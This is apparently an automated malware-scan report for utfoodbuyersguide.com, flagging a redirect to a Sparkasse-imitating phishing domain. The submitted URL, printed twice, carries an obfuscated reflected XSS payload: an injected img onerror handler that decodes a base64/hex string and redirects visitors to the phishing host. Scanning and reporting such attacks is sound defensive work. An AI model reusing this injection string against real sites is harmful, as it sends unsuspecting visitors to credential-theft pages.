ScanMalware.com

Security Scan Report: utfoodbuyersguide.com

Redirected to: https://wjybldxmgdco.sparkasse-information.click/

Submitted: Dec 1, 2025, 6:29:58 AMCompleted: Dec 1, 2025, 6:30:43 AMpubliccompleted
Loading additional data...

Summary

This website contacted 21 IPs in 2 countries across 8 domains to perform 46 HTTP transactions. The main domain is wjybldxmgdco.sparkasse-information.click and was registered NaN years ago.

Submitted URL: http://utfoodbuyersguide.com/listings.php?cat=%22%2F%3E%3Cimg%20src%3D%22https%3A%2F%2Fgoogle.com%2FLgX1dRduAowph.jpg%22%20onerror%3D%22window.location%3DdecodeURIComponent%28atob%28%27Njg3NDc0NzA3MzNhMmYyZjc3NmE3OTYyNmM2NDc4NmQ2NzY0NjM2ZjJlNzM3MDYxNzI2YjYxNzM3MzY1MmQ2OTZlNjY2ZjcyNmQ2MTc0Njk2ZjZlMmU2MzZjNjk2MzZi%27%29.replace%28%2F%28..%29%2Fg%2C%20%27%25%241%27%29%29%3B%22%3E?a8arKmg=FAr0YXReLX&F3sDcised=XjxXScs

Effective URL: https://wjybldxmgdco.sparkasse-information.click/Redirected

AI Security Verdict

High Risk

Confidence: 92%

8
Risk Score

Site is flagged as phishing; do not trust

Risk Factors
Cloudflare phishing warning indicating strong malicious activity
Suspicious redirect to a non‑brand click domain
Unranked, low‑reputation domain with unknown age
Domain age information unavailable

Details

Bot Protection Detected

This website is protected by Cloudflare bot protection. Our scanner was challenged or blocked during access.

Page Title

Suspected phishing site | Cloudflare

Scan Type

public

Language

🇺🇸

English

(80% confidence)

Category

phishing scam

(87%)

Domain Information

The domain name 'utfoodbuyersguide.com' uses the commercial generic top-level domain (.com) while skipping any subdomain. The second-level label 'utfoodbuyersguide' is 17 characters long holding eight vowels versus nine consonants. Splitting it apart reveals 4 words: ut, food, buyers, guide. Expect 4.5 characters per word on average. No strong language cues emerged from the frequency lists.

Screenshot

Security scan screenshot of http://utfoodbuyersguide.com/listings.php?cat=%22%2F%3E%3Cimg%20src%3D%22https%3A%2F%2Fgoogle.com%2FLgX1dRduAowph.jpg%22%20onerror%3D%22window.location%3DdecodeURIComponent%28atob%28%27Njg3NDc0NzA3MzNhMmYyZjc3NmE3OTYyNmM2NDc4NmQ2NzY0NjM2ZjJlNzM3MDYxNzI2YjYxNzM3MzY1MmQ2OTZlNjY2ZjcyNmQ2MTc0Njk2ZjZlMmU2MzZjNjk2MzZi%27%29.replace%28%2F%28..%29%2Fg%2C%20%27%25%241%27%29%29%3B%22%3E?a8arKmg=FAr0YXReLX&F3sDcised=XjxXScs

Page Load Overview

1.65s
Total Load Time
46
HTTP Requests
8
Domains
503 KB
Total Size

Language Analysis

Primary Language

🇺🇸English
Code: en
Confidence:80%
Script:Latin
Direction:ltr

Detection Details

Language Code:en
Detection Confidence:80%
Script Type:Latin
HTML Lang Attribute:en-US
Text Length:395 chars
Detector Agreement:100%

Website Classification

Primary Category

phishing scam87% confidence
Type: dynamic
Method: ml+structural

All Detected Categories

phishing scam
87%
technology software
28%
phishing/scam
20%

Detected Features

No structural features detected

Domain & IP Information

RequestsIP AddressLocationAS Autonomous System
13173.251.31.4Brentwood, New York, United States
AS6128CABLE-NET-1
6104.18.95.41United States
AS13335CLOUDFLARENET
6104.21.44.87United States
AS13335CLOUDFLARENET
3142.250.184.227United States
AS15169GOOGLE
2216.58.206.72United States
AS15169GOOGLE
2172.67.198.55United States
AS13335CLOUDFLARENET
2142.250.185.202United States
AS15169GOOGLE
22a00:1450:4001:830::200eFrankfurt am Main, Hesse, Germany
AS15169GOOGLE
22a00:1450:4001:82a::2008Frankfurt am Main, Hesse, Germany
AS15169GOOGLE
22606:4700::6812:acfUnited States
AS13335CLOUDFLARENET
4621--

Content Similarity HashesFor malware variant detection

Image Hashes

Perceptual Hashes

Average Hash:N/A
Perceptual Hash:N/A
Difference Hash:N/A
Wavelet Hash:N/A
Color Hash:N/A

Other Hashes

Crop Resistant:N/A

Scan History

Scan history not available

Unable to load historical scan data